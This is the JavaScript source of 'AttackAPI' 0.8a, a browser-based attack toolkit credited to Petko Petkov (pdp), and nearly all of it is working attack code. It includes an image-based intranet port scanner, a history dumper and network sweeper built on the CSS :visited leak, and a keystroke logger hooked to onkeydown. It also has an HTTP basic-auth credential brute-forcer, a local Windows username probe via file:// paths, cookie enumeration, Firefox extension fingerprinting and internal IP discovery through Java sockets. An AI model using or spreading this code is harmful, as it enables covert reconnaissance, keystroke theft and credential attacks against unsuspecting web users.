var AttackAPI = {
	version: '0.8a',
	author: 'Petko Petkov | pdp (architect)',
	homepage: 'http://www.gnucitizen.org',
	credits: {
		JeremiahGrossman: {homepage: 'http://jeremiahgrossman.blogspot.com/'},
		RSnake: {homepage: 'http://ha.ckers.org'},
		DanielBartlett: {homepage: 'http://f-box.org/~dan/'},
		PeterPaulKoch: {homepage: 'http://www.quirksmode.org/'},
		TylerAkins: {homepage: 'http://rumkin.com'},
		VladislavMysla: {homepage: ''}
	}};
AttackAPI.URLScanner = {};
AttackAPI.URLScanner.scan = function (callback, URLs, timeout) {
	var timeout = (timeout == null)?1000:timeout;
	var checkSingleURL = function (URL) {
		var request = AttackAPI.RequestBuilder.build();
		request.onreadystatechange = function () {
			if (request.readyState == 4) {
				clearTimeout(timer);
				callback(URL, request.status);
			}
		};
		request.open('GET', URL, true);
		request.send(null);
		
		var timer = setTimeout(function () {
			request.abort();
			callback(URL, 408);
		}, timeout);
	};
	
	for (index = 0; index < URLs.length; index++)
		checkSingleURL(URLs[index]);
};
AttackAPI.URLScanner.scriptScan = function (callback, URLs, timeout) {
	var timeout = (timeout == null)?1000:timeout;
	var head = document.getElementsByTagName('head')[0];
	var checkSingleURL = function (URL) {
		var script = document.createElement('script');
		script.type = 'text/javascript';
		script.defer = true;
		script.src = URL;
		script.onerror = function () {
			clearTimeout(timer);
			head.removeChild(script);
			callback(URL, false);
		};
		script.onload = function () {
			clearTimeout(timer);
			head.removeChild(script);
			callback(URL, true);
		};
		
		head.appendChild(script);
		
		var timer = setTimeout(function () {
			head.removeChild(script);
			callback(URL, false);
		}, timeout);
	};
	
	var onerror = window.onerror;
	window.onerror = function (message, URL, line) {
		if (onerror)
			return onerror(message, URL, line);
		
		return true;
	};
	
	for (var index = 0; index < URLs.length; index++)
		checkSingleURL(URLs[index]);
};
AttackAPI.Server = {};
AttackAPI.Server.getPlatformInfo = function (callback, timeout) {
	var timeout = (timeout == undefined)?1000:timeout;
	var request = AttackAPI.RequestBuilder.build();
	request.onreadystatechange = function () {
		if (request.readyState == 4) {
			clearTimeout(timer);
			callback({ platform: request.getResponseHeader('Server'),
			           date: request.getResponseHeader('Date'),
			           powered_by: request.getResponseHeader('X-Powered-By') });
		}
	};
	request.open('HEAD', document.location);
	request.send(null);
	
	var timer = setTimeout(function () {
		request.abort();
		callback(undefined);
	}, timeout);
};
AttackAPI.Server.getNetworkInfo = function () {
	var hostname = document.domain;
	var address = undefined;
	
	try {
		var sock = new java.net.Socket();
		sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
		sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
		hostname = sock.getInetAddress().getHostName();	
		address = sock.getInetAddress().getHostAddress();	
	} catch (e) {}
	
	return {hostname: hostname, address: address};
};
AttackAPI.CookieJar = {};
AttackAPI.CookieJar.setCookie = function (name, value, expires, path, domain, secure) {
	document.cookie = name + '=' + escape(value) +
	                  ((expires == undefined)?'':'; expires=' + expires) +
					  ((path == undefined)?'':'; path=' + path) +
					  ((domain == undefined)?'':'; domain=' + domain) +
					  ((secure == undefined)?'':'; secure=' + secure);
};
AttackAPI.CookieJar.delCookie = function (name) {
	AttackAPI.CookieJar.setCookie(name, '');
};
AttackAPI.CookieJar.getCookie = function (name) {
	var tokens = document.cookie.split(';');
	
	for (var index = 0; index < tokens.length; index++) {
		var pair = tokens[index].replace(/^\s*/, '');
		
		if (name == pair.substring(0, name.length))
			return pair.substring(name.length + 1);
	}
	
	return null;
};
AttackAPI.CookieJar.listCookies = function () {
	var results = new Array();
	var tokens = document.cookie.split(';');
	
	for (var index = 0; index < tokens.length; index++) {
		var pair = tokens[index].split('=');
		
		if (pair[1] && !(pair[0] in results))
			results.push(pair[0]);
	}
	
	return results;
};
AttackAPI.NetworkSweeper = {};
AttackAPI.NetworkSweeper.lazySweep = function (callback, targets, protocols) {
	var links = [];
	var protocols = (protocols == null)?['ftp', 'http', 'https']:protocols;

	for (index = 0; index < targets.length; index++) {
		for (zindex = 0; zindex < protocols.length; zindex++) {
			var link = new String(protocols[zindex] + '://' + targets[index]);
			link.target = targets[index];
			links.push(link);
		}
	}	
	
	AttackAPI.HistoryDumper.lazyDump(function (link, status) {
		callback(link.target, status);
	}, links);
};
AttackAPI.HistoryDumper = {};
AttackAPI.HistoryDumper.lazyDump = function (callback, links) {
	var iframe = document.createElement('iframe');
	iframe.style.visibility = 'hidden';
	document.body.appendChild(iframe);
	
	var doc = iframe.contentDocument;
	if (doc == undefined) doc = iframe.contentWindow.document;
		
	doc.open();
	doc.write('<style>a:visited{display: none}</style>');
	doc.close();
	
	for (index = 0; index < links.length; index++) {
		var testLink = doc.createElement('a');
		testLink.href = links[index];
		doc.body.appendChild(testLink);
		
		if (testLink.currentStyle) var display = testLink.currentStyle['display'];
		else var display = doc.defaultView.getComputedStyle(testLink, null).getPropertyValue('display')
			
		callback(links[index], display == 'none'?true:false);
	}
	
	document.body.removeChild(iframe);
};
AttackAPI.Client = {};
AttackAPI.Client.getPlatformInfo = function (signatures) {
	return {platform: navigator.platform};
};
AttackAPI.Client.getBrowserInfo = function (signatures) {
	var browser = undefined;
	
	if (navigator.userAgent) {
		browser = navigator.userAgent;
	} else if (navigator.vendor) {
		browser = navigator.vendor;
	} else if (window.opera) {
		browser = "Opera";
	}
		
	return {browser: browser};
};
AttackAPI.Client.getPluginsInfo = function () {
	return navigator.plugins;
};
AttackAPI.Client.getNetworkInfo = function () {
	var hostname = undefined;
	var address = undefined;
	
	try {
		var sock = new java.net.Socket();
		sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
		sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
		hostname = sock.getLocalAddress().getHostName();
		address = sock.getLocalAddress().getHostAddress();	
	} catch (e) {}
	
	return {hostname: hostname, address: address};
};
AttackAPI.ExtensionScanner = {};
AttackAPI.ExtensionScanner.scan = function (callback, signatures, timeout) {
	var signatures = (signatures == null)?AttackAPI.Signatures.extensions:signatures;
	var timeout = (timeout == null)?100:timeout;
	var checkSingleExtension = function (signature) {
		var img = new Image();
		img.onload = function() {
			if (!img) return;
			img = undefined;
			callback(signature, true)
		};
		img.onerror = function() {
			if (!img) return;
			img = undefined;
			callback(signature, false)
		};
		img.src = signature.src;
		
		setTimeout(img.onerror, timeout);
	};
	
	for (index = 0; index < signatures.length; index++)
		checkSingleExtension(signatures[index]);
};
AttackAPI.Base64Encoder = {};
AttackAPI.Base64Encoder.character_space = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
AttackAPI.Base64Encoder.encode = function(input) {
	var output = "";
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;
	
	do {
		chr1 = input.charCodeAt(i++);
		chr2 = input.charCodeAt(i++);
		chr3 = input.charCodeAt(i++);
		
		enc1 = chr1 >> 2;
		enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
		enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
		enc4 = chr3 & 63;
		
		if (isNaN(chr2)) {
			enc3 = enc4 = 64;
		} else if (isNaN(chr3)) {
			enc4 = 64;
		}
		
		output = output + AttackAPI.Base64Encoder.character_space.charAt(enc1) + AttackAPI.Base64Encoder.character_space.charAt(enc2) + AttackAPI.Base64Encoder.character_space.charAt(enc3) + AttackAPI.Base64Encoder.character_space.charAt(enc4);
	} while (i < input.length);
	
	return output;
};
AttackAPI.Base64Encoder.decode = function (input) {
	var output = "";
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;

	input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

	do {
		enc1 = AttackAPI.Base64Encoder.character_space.indexOf(input.charAt(i++));
		enc2 = AttackAPI.Base64Encoder.character_space.indexOf(input.charAt(i++));
		enc3 = AttackAPI.Base64Encoder.character_space.indexOf(input.charAt(i++));
		enc4 = AttackAPI.Base64Encoder.character_space.indexOf(input.charAt(i++));

		chr1 = (enc1 << 2) | (enc2 >> 4);
		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
		chr3 = ((enc3 & 3) << 6) | enc4;

		output = output + String.fromCharCode(chr1);

		if (enc3 != 64) {
			output = output + String.fromCharCode(chr2);
		}
		if (enc4 != 64) {
			output = output + String.fromCharCode(chr3);
		}
	} while (i < input.length);
	
	return output;
};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scan = function (callback, target, ports, timeout) {
	var timeout = (timeout == null)?100:timeout;
	var checkSinglePort = function (target, port) {
		var img = new Image();
		img.onload = img.onerror = function () {
			if (!img) return;
			img = undefined;
			callback(target, port, true);
		};
		img.src = 'http://' + target + ':' + port;
		
		setTimeout(function () {
			if (!img) return;
			img = undefined;
			callback(target, port, false);
		}, timeout);
	};
	
	for (index = 0; index < ports.length; index++)
 		checkSinglePort(target, ports[index]);
};
AttackAPI.PortScanner.lazyScan = function (callback, target, ports, protocols) {
	var links = [];
	var protocols = (protocols == null)?['ftp', 'http', 'https']:protocols;
	
	for (index = 0; index < ports.length; index++) {
		for (zindex = 0; zindex < protocols.length; zindex++) {
			var link = new String(protocols[zindex] + '://' + target + ':' + ports[index]);
			link.target = target;
			link.port = ports[index];
			links.push(link);
		}
	}
	
	AttackAPI.HistoryDumper.lazyDump(function (link, status) {
		callback(link.target, link.port, status);
	}, links);
};
AttackAPI.KeyLogger = {};
AttackAPI.KeyLogger.install = function (callback, target, delay) {
	var target = (target == undefined)?window:target;
	var delay = (delay == undefined)?0:delay;
	
	setTimeout(function () {
		var onkeydown = target.onkeydown;
		target.onkeydown = function (e) {
			var e = (e == undefined)?window.event:e;
			
			callback(e.keyCode?e.keyCode:e.which, e);
			
			if (onkeydown)
				return onkeydown(e);
				
			return true;
		};
	}, delay);
};
AttackAPI.AuthorizationForcer = {};
AttackAPI.AuthorizationForcer.lazyForce = function (callback, target, credentials) {
	var links = [];
	var protocol = target.substring(0, target.indexOf(':'));
	var url = target.substring(target.indexOf(':') + 3);
	
	for (index = 0; index < credentials.length; index++) {
		var link = new String(protocol + '://' + credentials[index] + '@' + url);
		link.target = target;
		link.credential = credentials[index];
		links.push(link);
	}
	
	AttackAPI.HistoryDumper.lazyDump(function (link, status) {
		callback(link.target, link.credential, status);
	}, links);
};
AttackAPI.UsernameScanner = {};
AttackAPI.UsernameScanner.scan = function (callback, usernames) {
	var URLs = [];
	
	for (var index = 0; index < usernames.length; index++) {
		var URL = new String('file:///C:/Documents and Settings/'+ usernames[index] + '/SendTo/desktop.ini');
		URL.username = usernames[index];
		URLs.push(URL);
	}
		
	AttackAPI.URLScanner.scriptScan(function (URL, status) {
		callback(URL.username, status);
	}, URLs);
};
AttackAPI.RequestBuilder = {};
AttackAPI.RequestBuilder.build = function () {
	var request;
	
	if (window.XMLHttpRequest) {
		request = new XMLHttpRequest();
	} else if (window.createRequest) {
		request = window.createRequest();
	} else if (window.ActiveXObject) {
		try {
			request = new ActiveXObject("Msxml2.XMLHTTP");
		} catch (e) {
			try {
				request = new ActiveXObject("Microsoft.XMLHTTP");
			} catch (e) {}
		}
	}
	
	if (!request)
		throw 'request implementation not found';
	
	return request;
};
AttackAPI.GoogleSearch = {};
AttackAPI.GoogleSearch.callbacks = {};
AttackAPI.GoogleSearch.search = function (callback, query, key, context) {
	var key = (key == undefined)?'internal-documentation':key;
	var context = (context == undefined)?0:context;
	var index = (AttackAPI.GoogleSearch.callbacks.index == undefined)?1:AttackAPI.GoogleSearch.callbacks.index + 1;
	
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.defer = true;
	script.src = 'http://www.google.com/uds/GwebSearch?callback=AttackAPI.GoogleSearch.callbacks.callback' + index + '&context=' + context + '&lstkp=0&rsz=large&hl=en&q=' + query + '&key=' + key + '&v=0.1';
	
	AttackAPI.GoogleSearch.callbacks['callback' + index] = function (context, results, status) {
		document.body.removeChild(script);
		delete AttackAPI.GoogleSearch.callbacks['callback' + index];
		callback(results, query, key, context, status);
	};
	
	document.body.appendChild(script);
	AttackAPI.GoogleSearch.callbacks.index = index;
};
AttackAPI.NetworkCalculator = {};
AttackAPI.NetworkCalculator.IPToNumber = function (ip) {
	var octets = ip.split('.');
	return (16777216 * octets[0]) + (65536 * octets[1]) + (256 * octets[2]) + Number(octets[3]);
};
AttackAPI.NetworkCalculator.numberToIP = function (number) {
	return Math.floor(number/16777216)%256 + '.' +
	       Math.floor(number/65536)%256 + '.' +
		   Math.floor(number/256)%256 + '.' +
		   Math.floor(number)%256;
};
AttackAPI.NetworkCalculator.CIDRToRange = function (cidr) {
	var tokens = cidr.split('/');
	var start = AttackAPI.NetworkCalculator.IPToNumber(tokens[0]);
	var stop = Math.pow(2, 32 - tokens[1]) + start - 1;
	return {start: start, stop: stop};
};
AttackAPI.NetworkCalculator.RANGEToRange = function (range) {
	var tokens = range.split('-');
	var start = AttackAPI.NetworkCalculator.IPToNumber(tokens[0].replace(/^\s+/g, '').replace(/\s+$/g, ''));
	var stop = AttackAPI.NetworkCalculator.IPToNumber(tokens[1].replace(/^\s+/g, '').replace(/\s+$/g, ''));
	return {start: start, stop: stop};
};
AttackAPI.NetworkCalculator.generateIPs = function (range) {
	var IPs = [];
	
	if (range.indexOf('/') != -1) var range = AttackAPI.NetworkCalculator.CIDRToRange(range);
	else var range = AttackAPI.NetworkCalculator.RANGEToRange(range);
	
	for (index = range.start; index <= range.stop; index++)
		IPs.push(AttackAPI.NetworkCalculator.numberToIP(index));
		
	return IPs;
};
AttackAPI.URLFetcher = {};
AttackAPI.URLFetcher.fetch = function (callback, URL, timeout) {
	var timeout = (timeout == undefined)?1000:timeout;
	var request = AttackAPI.RequestBuilder.build();
	request.onreadystatechange = function () {
		if (request.readyState == 4) {
			clearTimeout(timer);
			callback(URL, request.responseText, request.status);
		}
	};
	request.open('GET', URL, true);
	request.send(null);
	
	var timer = setTimeout(function () {
		request.abort();
		callback(URL, '', 408);
	}, timeout);
};
AttackAPI.URLFetcher.iframeFetch = function (callback, URL, timeout) {
	var timeout = (timeout == undefined)?1000:timeout;
	var iframe = document.createElement('iframe');
	iframe.style.visibility = 'hidden';
	iframe.src = URL;
	iframe.onload = function () {
		clearTimeout(timer);
		
		var content = '';
		if (iframe.contentDocument) {
			content = iframe.contentDocument.body.innerHTML;
		} else if (iFrameEl.contentWindow) {
			content = iframe.contentWindow.document.body.innerHTML;
		} else if (iFrameEl.document) {
			content = iframe.document.body.innerHTML;
		}
		
		iframe.src = '';
		document.body.removeChild(iframe);
		callback(URL, content, true);
	};
	
	document.body.appendChild(iframe);
	
	var timer = setTimeout(function () {
		iframe.src = '';
		document.body.removeChild(iframe);
		callback(URL, undefined, false);
	}, timeout);
};
AttackAPI.URLFetcher.liveJavaFetch = function (callback, URL) {
	var data = null;
	var destination = new java.net.URL(URL);
	var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536);
	var stream = destination.getContent();
	
	while (true) {
		var count = stream.read(buffer);
		
		if (count <= 0)
			break;
			
		var str = new java.lang.String(buffer, 0, count);
		data += str;
	}
	
	stream.close();
	callback(URL, data);
};
AttackAPI.Signatures = {};
AttackAPI.Signatures.extensions = [
	{ name: 'Adblock Plus', src: 'chrome://adblockplus/skin/adblockplus.png' },
	{ name: 'Auto Copy', src: 'chrome://autocopy/skin/autocopy.png' },
	{ name: 'ColorZilla', src: 'chrome://colorzilla/skin/logo.png' },
	{ name: 'Customize Google', src: 'chrome://customizegoogle/skin/32x32.png' },
	{ name: 'DownThemAll!', src: 'chrome://dta/content/immagini/icon.png' },
	{ name: 'Faster Fox', src: 'chrome://fasterfox/skin/icon.png' },
	{ name: 'Flash Block', src: 'chrome://flashblock/skin/flash-on-24.png' },
	{ name: 'FlashGot', src: 'chrome://flashgot/skin/icon32.png' },
	{ name: 'Forecastfox', src: 'chrome://forecastfox/skin/images/icon.png' },
	{ name: 'Google Toolbar', src: 'chrome://google-toolbar/skin/icon.png' },
	{ name: 'Greasemonkey', src: 'chrome://greasemonkey/content/status_on.gif' },
	{ name: 'IE Tab', src: 'chrome://ietab/skin/ietab-button-ie16.png' },
	{ name: 'IE View', src: 'chrome://ieview/skin/ieview-icon.png' },
	{ name: 'JS View', src: 'chrome://jsview/skin/jsview.gif' },
	{ name: 'Live HTTP Headers', src: 'chrome://livehttpheaders/skin/img/Logo.png' },
	{ name: 'MeasureIt', src: 'chrome://measureit/skin/measureit.png' },
	{ name: 'SEO For Firefox', src: 'chrome://seo4firefox/content/icon32.png' },
	{ name: 'SEOpen', src: 'chrome://seopen/skin/seopen.png' },
	{ name: 'Search Status', src: 'chrome://searchstatus/skin/cax10.png' },
	{ name: 'Server Switcher', src: 'chrome://switcher/skin/icon.png' },
	{ name: 'StumbleUpon', src: 'chrome://stumbleupon/content/skin/logo32.png' },
	{ name: 'Tab Mix Plus', src: 'chrome://tabmixplus/skin/tmp.png' },
	{ name: 'Torrent-Search Toolbar', src: 'chrome://torrent-search/skin/v.png' },
	{ name: 'User Agent Switcher', src: 'chrome://useragentswitcher/content/logo.png' },
	{ name: 'View Source With', src: 'chrome://viewsourcewith/skin/ff/tb16.png' },
	{ name: 'Web Developer', src: 'chrome://webdeveloper/content/images/logo.png' }];
